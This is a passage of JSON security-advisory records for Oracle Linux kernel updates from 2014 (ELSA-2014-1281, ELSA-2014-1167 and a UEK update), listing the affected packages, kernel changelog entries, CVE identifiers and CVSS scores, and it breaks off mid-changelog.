"3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}], "description": "[3.10.0-123.8.1]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-123.8.1]\n- [scsi] fnic: fix broken FIP discovery by initializing multicast address (Chris Leech) [1119727 1100078]\n- [scsi] libfcoe: Make fcoe_sysfs optional / fix fnic NULL exception (Chris Leech) [1119727 1100078]\n- [fs] nfs: Don't mark the data cache as invalid if it has been flushed (Scott Mayhew) [1115817 1114054]\n- [fs] nfs: Clear NFS_INO_REVAL_PAGECACHE when we update the file size (Scott Mayhew) [1115817 1114054]\n- [fs] nfs: Fix cache_validity check in nfs_write_pageuptodate() (Scott Mayhew) [1115817 1114054]\n- [mm] hugetlb: ensure hugepage access is denied if hugepages are not supported (David Gibson) [1122115 1081671]\n- [kernel] hrtimer: Prevent all reprogramming if hang detected (Prarit Bhargava) [1113175 1094732]\n[3.10.0-123.7.1]\n- [scsi] set DID_TIME_OUT correctly (Ewan Milne) [1122575 1103881]\n- [scsi] fix invalid setting of host byte (Ewan Milne) [1122575 1103881]\n- [scsi] More USB deadlock fixes (Ewan Milne) [1122575 1103881]\n- [scsi] Fix USB deadlock caused by SCSI error handling (Ewan Milne) [1122575 1103881]\n- [scsi] Fix command result state propagation (Ewan Milne) [1122575 1103881]\n- [scsi] Fix spurious request sense in error handling (Ewan Milne) [1122575 1103881]\n- [input] synaptics: fix resolution for manually provided min/max (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: change min/max quirk table to pnp-id matching (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: add a matches_pnp_id helper function (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: T540p - unify with other LEN0034 models (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: add min/max quirk for the ThinkPad W540 (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: add min/max quirk for ThinkPad Edge E431 (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: add min/max quirk for ThinkPad T431s, L440, L540, S1 Yoga and X1 (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: report INPUT_PROP_TOPBUTTONPAD property (Benjamin Tissoires) [1122559 1093449]\n- [input] Add INPUT_PROP_TOPBUTTONPAD device property (Benjamin Tissoires) [1122559 1093449]\n- [input] i8042: add firmware_id support (Benjamin Tissoires) [1122559 1093449]\n- [input] serio: add firmware_id sysfs attribute (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: add manual min/max quirk for ThinkPad X240 (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: add manual min/max quirk (Benjamin Tissoires) [1122559 1093449]\n- [input] synaptics: fix incorrect placement of __initconst (Benjamin Tissoires) [1122559 1093449]\n- [ethernet] be2net: Fix invocation of be_close() after be_clear() (Ivan Vecera) [1122558 1066644]\n- [ethernet] be2net: enable interrupts in EEH resume (Ivan Vecera) [1121712 1076682]\n- [ethernet] sfc: PIO:Restrict to 64bit arch and use 64-bit writes (Nikolay Aleksandrov) [1119725 1089024]\n- [kernel] ftrace: Hardcode ftrace_module_init() call into load_module() (Takahiro MUNEDA) [1119721 1061553]\n- [kernel] trace: Make register/unregister_ftrace_command __init (Takahiro MUNEDA) [1119721 1061553]\n- [block] nvme: Initialize device reference count earlier (David Milburn) [1119720 1081734]\n- [ata] ahci: accommodate tag ordered controller (David Milburn) [1117154 1083746]\n- [s390] af_iucv: recvmsg problem for SOCK_STREAM sockets (Hendrik Brueckner) [1115585 1109703]\n- [s390] af_iucv: correct cleanup if listen backlog is full (Hendrik Brueckner) [1115584 1109033]\n- [mm] Revert: vmscan: do not swap anon pages just because free+file is low (Johannes Weiner) [1114938 1102991]\n- [drm] nouveau/bios: fix a bit shift error introduced by recent commit (Ulrich Obergfell) [1114869 1089936]\n- [ethernet] bnx2x: Adapter not recovery from EEH error injection (Michal Schmidt) [1107722 1067154]\n- [kernel] auditsc: audit_krule mask accesses need bounds checking (Denys Vlasenko) [1102708 1102710] {CVE-2014-3917}\n- [block] mtip32xx: mtip_async_complete() bug fixes (Jeff Moyer) [1125776 1102281]\n- [block] mtip32xx: Unmap the DMA segments before completing the IO request (Jeff Moyer) [1125776 1102281]\n- [net] l2tp: don't fall back on UDP [get|set]sockopt (Petr Matousek) [1119465 1119466] {CVE-2014-4943}\n- [s390] ptrace: correct insufficient sanitization when setting psw mask (Hendrik Brueckner) [1114090 1113673] {CVE-2014-3534}", "edition": 1, "reporter": "Oracle", "published": "2014-09-22T00:00:00", "title": "kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4943", "CVE-2014-3917", "CVE-2014-3534"], "modified": "2014-09-22T00:00:00", "id": "ELSA-2014-1281", "href": "http://linux.oracle.com/errata/ELSA-2014-1281.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:16:22", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-431.29.2.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-431.29.2.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-431.29.2.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-431.29.2.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-431.29.2.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-431.29.2.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-431.29.2.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-431.29.2.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "perf-2.6.32-431.29.2.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-431.29.2.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-431.29.2.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-431.29.2.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-431.29.2.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "src", "packageFilename": "kernel-2.6.32-431.29.2.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "src", "packageFilename": "kernel-2.6.32-431.29.2.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.29.2.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-431.29.2.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}], "description": "[2.6.32-431.29.2]\n- [kernel] futex: Fix errors in nested key ref-counting (Denys Vlasenko) [1094457 1094458] {CVE-2014-0205}\n- [net] vxlan: fix NULL pointer dereference (Jiri Benc) [1114549 1096351] {CVE-2014-3535}\n[2.6.32-431.29.1]\n- [mm] hugetlb: ensure hugepage access is denied if hugepages are not supported (Gustavo Duarte) [1118782 1086450]\n- [security] keys: Increase root_maxkeys and root_maxbytes sizes (Steve Dickson) [1115542 1113607]\n- [fs] lockd: Ensure that nlmclnt_block resets block->b_status after a server reboot (Steve Dickson) [1110180 959006]\n- [net] filter: add vlan tag access (Jiri Benc) [1108526 1082097]\n- [net] filter: add XOR operation (Jiri Benc) [1108526 1082097]\n- [net] filter: add SKF_AD_RXHASH and SKF_AD_CPU (Jiri Benc) [1108526 1082097]\n- [net] filter: Socket filter ancilliary data access for skb->dev->type (Jiri Benc) [1108526 1082097]\n- [net] filter: Add SKF_AD_QUEUE instruction (Jiri Benc) [1108526 1082097]\n- [net] filter: ingress socket filter by mark (Jiri Benc) [1108526 1082097]\n- [netdrv] bonding: look for bridge IPs in arp monitoring (Veaceslav Falico) [1102794 704190]\n- [s390] af_iucv: wrong mapping of sent and confirmed skbs (Hendrik Brueckner) [1112390 1102248]\n- [s390] af_iucv: recvmsg problem for SOCK_STREAM sockets (Hendrik Brueckner) [1112390 1102248]\n- [s390] af_iucv: fix recvmsg by replacing skb_pull() function (Hendrik Brueckner) [1112390 1102248]\n- [s390] kernel: avoid page table walk on user space access (Hendrik Brueckner) [1111194 1099146]\n- [s390] qeth: postpone freeing of qdio memory (Hendrik Brueckner) [1112134 1094379]\n- [s390] qeth: Fix retry logic in hardsetup (Hendrik Brueckner) [1112134 1094379]\n- [s390] qeth: Recognize return codes of ccw_device_set_online (Hendrik Brueckner) [1112134 1094379]\n- [s390] qdio: remove API wrappers (Hendrik Brueckner) [1112134 1094379]\n- [scsi] Ensure medium access timeout counter resets (David Jeffery) [1117153 1036884]\n- [scsi] Fix error handling when no ULD is attached (David Jeffery) [1117153 1036884]\n- [scsi] Handle disk devices which can not process medium access commands (David Jeffery) [1117153 1036884]\n- [fs] nfs: Fix calls to drop_nlink() (Steve Dickson) [1099607 1093819]\n- [mm] swap: do not skip lowest_bit in scan_swap_map() scan loop (Rafael Aquini) [1099728 1060886]\n- [mm] swap: fix shmem swapping when more than 8 areas (Rafael Aquini) [1099728 1060886]\n- [mm] swap: fix swapon size off-by-one (Rafael Aquini) [1099728 1060886]\n- [md] avoid deadlock when dirty buffers during md_stop (Jes Sorensen) [1121541 994724]\n- [x86] hyperv: bypass the timer_irq_works() check (Jason Wang) [1112226 1040349]\n[2.6.32-431.28.1]\n- [kernel] auditsc: audit_krule mask accesses need bounds checking (Denys Vlasenko) [1102704 1102705] {CVE-2014-3917}\n- [net] ipv4: fix route cache rebuilds (Jiri Pirko) [1113824 1111631]\n- [fs] nfsd: notify_change needs elevated write count (Mateusz Guzik) [1110177 1105057]\n- [fs] nfsv4: close needs to handle NFS4ERR_ADMIN_REVOKED (Dave Wysochanski) [1096397 1082127]\n- [fs] pipe: skip file_update_time on frozen fs (Eric Sandeen) [1114405 1093077]\n- [fs] nfs: Fail the truncate() if the lock/open stateid is invalid (Steve Dickson) [1090613 1075123]\n- [fs] nfs: Servers should only check SETATTR stateid open mode on size change (Steve Dickson) [1090613 1075123]\n- [fs] nfs: Fail data server I/O if stateid represents a lost lock (Steve Dickson) [1090613 1075123]\n- [fs] nfs: Fix the return value of nfs4_select_rw_stateid (Steve Dickson) [1090613 1075123]\n- [fs] nfs: Use the open stateid if the delegation has the wrong mode (Steve Dickson) [1090613 1075123]\n- [fs] nfs: nfs4_stateid_is_current should return 'true' for an invalid stateid (Steve Dickson) [1090613 1075123]\n- [fs] nfs: fix error return in nfs4_select_rw_stateid (Steve Dickson) [1090613 1075123]\n- [fs] nfs: Document the recover_lost_locks kernel parameter (Jeff Layton) [1089359 963785]\n- [fs] nfs: Don't try to recover NFSv4 locks when they are lost (Jeff Layton) [1089359 963785]\n- [fs] nfs: Fix handling of partially delegated locks (Jeff Layton) [1120074 959788]\n- [fs] nfs: Convert the nfs4_lock_state->ls_flags to a bit field (Jeff Layton) [1120074 959788]\n- [x86] Optimize switch_mm() for multi-threaded workloads (Rik van Riel) [1115821 991518]\n- [netdrv] pppol2tp: fail when socket option level is not SOL_PPPOL2TP [1119461 1119462] {CVE-2014-4943}\n- [kernel] utrace: force IRET path after utrace_finish_vfork() (Oleg Nesterov) [1115932 1115933] {CVE-2014-4699}\n[2.6.32-431.27.1]\n- [scsi] fix performance regression due to inverted blk_get_queue return (Mike Snitzer) [1117582 1098658]\n- [net] openvswitch: fix use-after-free bug in netns (Flavio Leitner) [1120651 1100127]\n[2.6.32-431.26.1]\n- [net] gro: fix deliver of trunk packets to VLAN interfaces (Marcelo Ricardo Leitner) [1116231 1112324]\n[2.6.32-431.25.1]\n- [net] sctp: Fix sk_ack_backlog wrap-around problem (Daniel Borkmann) [1113969 1085932] {CVE-2014-4667}\n[2.6.32-431.24.1]\n- [alsa] aloop: Close races at restarting the stream (Jaroslav Kysela) [1112492 1078592]\n- [alsa] aloop: Export snd_pcm_constraint_mask64() (Jaroslav Kysela) [1112492 1078592]\n- [alsa] pcm: Warn when buffer preallocation fails (Jaroslav Kysela) [1112492 1078592]\n- [alsa] aloop: Add SNDRV_PCM_STATE_PAUSED case in wait_for_avail function (Jaroslav Kysela) [1112492 1078592]\n- [alsa] jack: Unregister input device at disconnection (Jaroslav Kysela) [1112492 1078592]\n- [alsa] aloop: Optimize module name check (Jaroslav Kysela) [1112492 1078592]\n- [alsa] pcm: Add fallthru comments (Jaroslav Kysela) [1112492 1078592]\n- [alsa] aloop: Fix Oops while PM resume (Jaroslav Kysela) [1112492 1078592]\n- [alsa] aloop: add locking to timer access (Jaroslav Kysela) [1112492 1078592]", "edition": 1, "reporter": "Oracle", "published": "2014-09-09T00:00:00", "title": "kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943", "CVE-2014-3917", "CVE-2014-3535", "CVE-2014-0205", "CVE-2014-4667"], "modified": "2014-09-09T00:00:00", "href": "http://linux.oracle.com/errata/ELSA-2014-1167.html", "id": "ELSA-2014-1167", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T13:10:02", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-44.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-44.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.3-4.el6", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-44.el6uek-0.4.3-4.el6.src.rpm", "packageName": "dtrace-modules-3.8.13-44.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-44.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-44.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.3-4.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-44.el6uek-0.4.3-4.el6.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-44.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-44.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-44.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-44.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-44.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-44.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-44.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.3-4.el7", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-44.el7uek-0.4.3-4.el7.src.rpm", "packageName": "dtrace-modules-3.8.13-44.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-44.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.3-4.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-44.el7uek-0.4.3-4.el7.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-44.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-44.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-44.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-44.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-44.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-44.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}], "edition": 2, "description": "kernel-uek\n[3.8.13-44]\n- net: Use netlink_ns_capable to verify the permisions of netlink messages (Eric W. Biederman) [Orabug: 19404229] {CVE-2014-0181}\n- net: Add variants of capable for use on netlink messages (Eric W. Biederman) [Orabug: 19404229] \n- net: Add variants of capable for use on on sockets (Eric W. Biederman) [Orabug: 19404229] \n- netlink: Rename netlink_capable netlink_allowed (Eric W. Biederman) [Orabug: 19404229] \n- sctp: Fix sk_ack_backlog wrap-around problem (Xufeng Zhang) [Orabug: 19404238] {CVE-2014-4667}\n- Revert 'xen/fb: allow xenfb initialization for hvm guests' (Vaughan Cao) [Orabug: 19320529]\n[3.8.13-43]\n- init: fix in-place parameter modification regression (Krzysztof Mazur) [Orabug: 18954967] \n- drivers: scsi: storvsc: Correctly handle TEST_UNIT_READY failure (K. Y. Srinivasan) [Orabug: 19280065] \n- drivers: scsi: storvsc: Set srb_flags in all cases (K. Y. Srinivasan) [Orabug: 19280065] \n- Drivers: scsi: storvsc: Implement a timedout handler (K. Y. Srinivasan) [Orabug: 19280065] \n- Drivers: scsi: storvsc: Fix a bug in handling VMBUS protocol version (K. Y. Srinivasan) [Orabug: 19280065] \n- Drivers: scsi: storvsc: Filter commands based on the storage protocol version (K. Y. Srinivasan) [Orabug: 19280065] \n- Drivers: scsi: storvsc: Set cmd_per_lun to reflect value supported by the Host (K. Y. Srinivasan) [Orabug: 19280065] \n- Drivers: scsi: storvsc: Change the limits to reflect the values on the host (K. Y. Srinivasan) [Orabug: 19280065]\n[3.8.13-42]\n- filter: prevent nla extensions to peek beyond the end of the message (Mathias Krause) [Orabug: 19315780] {CVE-2014-3144} {CVE-2014-3145}\n[3.8.13-41]\n- rds: Lost locking in loop connection freeing (Pavel Emelyanov) [Orabug: 19124446] \n- ocfs2/o2net: incorrect to terminate accepting connections loop upon rejecting an invalid one (Tariq Saeed) [Orabug: 19296823] \n- xen/pciback: Don't deadlock when unbinding. (Konrad Rzeszutek Wilk) [Orabug: 19296592] \n- PCI: Split out pci_dev lock/unlock and save/restore (Alex Williamson) [Orabug: 19296592]\n[3.8.13-40]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19228689] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19222017] {CVE-2014-4699}\n- mpt3sas: Rework the MSI-X code to work on systems with many processors (Martin K. Petersen) [Orabug: 18182490] \n- mpt2sas: Rework the MSI-X code to work on systems with many processors (Martin K. Petersen) [Orabug: 18182490] \n- mpt3sas: Bump mpt3sas driver version to 04.100.00.00 (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: Added Reply Descriptor Post Queue (RDPQ) Array support (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: Bump mpt3sas driver version to 03.100.00.00 (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: Added OEM branding Strings (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: MPI2.5 Rev H (2.5.3) specifications (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: Copyright in driver sources is updated for year the 2014 (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: Clear PFA Status on SGPIO when PFA Drive is Removed or Replaced (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: MPI2.5 Rev G (2.5.2) specifications (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt3sas: Remove use of DEF_SCSI_QCMD (Matthew Wilcox) [Orabug: 19015667] \n- mpt3sas: Remove uses of serial_number (Matthew Wilcox) [Orabug: 19015667] \n- Allow MPT Fusion SAS 3.0 driver to be built into the kernel (Greg Kroah-Hartman) [Orabug: 19015667] \n- mpt3sas: Remove phys on topology change (Jan Vesely) [Orabug: 19015667] \n- mpt3sas: Added a driver module parameter max_msix_vectors (Sreekanth Reddy) [Orabug: 19015667] \n- mpt3sas: fix cleanup on controller resource mapping failure (Joe Lawrence) [Orabug: 19015667] \n- Revert 'mpt3sas: update from v02.100.00.00 to v3.00.00.00' (Martin K. Petersen) [Orabug: 19015667] \n- Revert 'mpt3sas: Rework the MSI-X code to work on systems with many processors' (Martin K. Petersen) [Orabug: 19015667] \n- mpt2sas: Added module parameter 'unblock_io' to unblock IO's during disk addition (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Bump mpt2sas driver version to 18.100.00.00 (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Get IOC_FACTS information using handshake protocol only after HBA card gets into READY or Operational state (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array support (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: For >2TB volumes, DirectDrive support sends IO's with LBA bit 31 to IR FW instead of DirectDrive (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Copyright in driver sources is updated for year the 2014 (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Clear PFA Status on SGPIO when PFA Drive is Removed or Replaced (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Bump mpt2sas driver version to 17.100.00.00 (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: MPI2 Rev Y (2.00.17) and Rev Z (2.00.18) specifications (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Added driver module parameter max_msix_vectors (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Add free smids to the head, not tail of list (Matthew Wilcox) [Orabug: 19015667] \n- mpt2sas: Remove use of DEF_SCSI_QCMD (Matthew Wilcox) [Orabug: 19015667] \n- mpt2sas: Remove uses of serial_number (Matthew Wilcox) [Orabug: 19015667] \n- mpt2sas: Don't disable device twice at suspend. (Tyler Stachecki) [Orabug: 19015667] \n- mpt2sas: Remove phys on topology change. (Jan Vesely) [Orabug: 19015667] \n- mpt2sas: Bump driver version to v16.100.00.00 (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Fix for kernel panic when driver loads with HBA connected to non LUN 0 configured expander (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: when Async scanning is enabled then while scanning, devices are removed but their transport layer entries are not removed (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Infinite loop can occur if MPI2_IOCSTATUS_CONFIG_INVALID_PAGE is not returned (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: The copyright in driver sources is updated for the year 2013 (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: MPI2 Rev X (2.00.16) specifications (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Change in MPI2_RAID_ACTION_SYSTEM_SHUTDOWN_INITIATED notification methodology (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Null pointer deference possibility in mpt2sas_ctl_event_callback function (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: fix cleanup on controller resource mapping failure (Joe Lawrence) [Orabug: 19015667] \n- mpt2sas: fix for unused variable 'event_data' warning (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Bump driver vesion to v15.100.00.00 (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Calulate the Reply post queue depth calculation as per the MPI spec (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: fix firmware failure with wrong task attribute (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Fix for device scan following host reset could get stuck in a infinite loop (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Update the timing requirements for issuing a Hard Reset (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: MPI2 Rev W (2.00.15) specification (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: Fix for issue Missing delay not getting set during system bootup (Reddy, Sreekanth) [Orabug: 19015667] \n- mpt2sas: Add support for OEM specific controller (Sreekanth Reddy) [Orabug: 19015667] \n- mpt2sas: fix for driver fails EEH, recovery from injected pci bus error (Sreekanth Reddy) [Orabug: 19015667] \n- Revert 'mpt2sas: update to LSI version 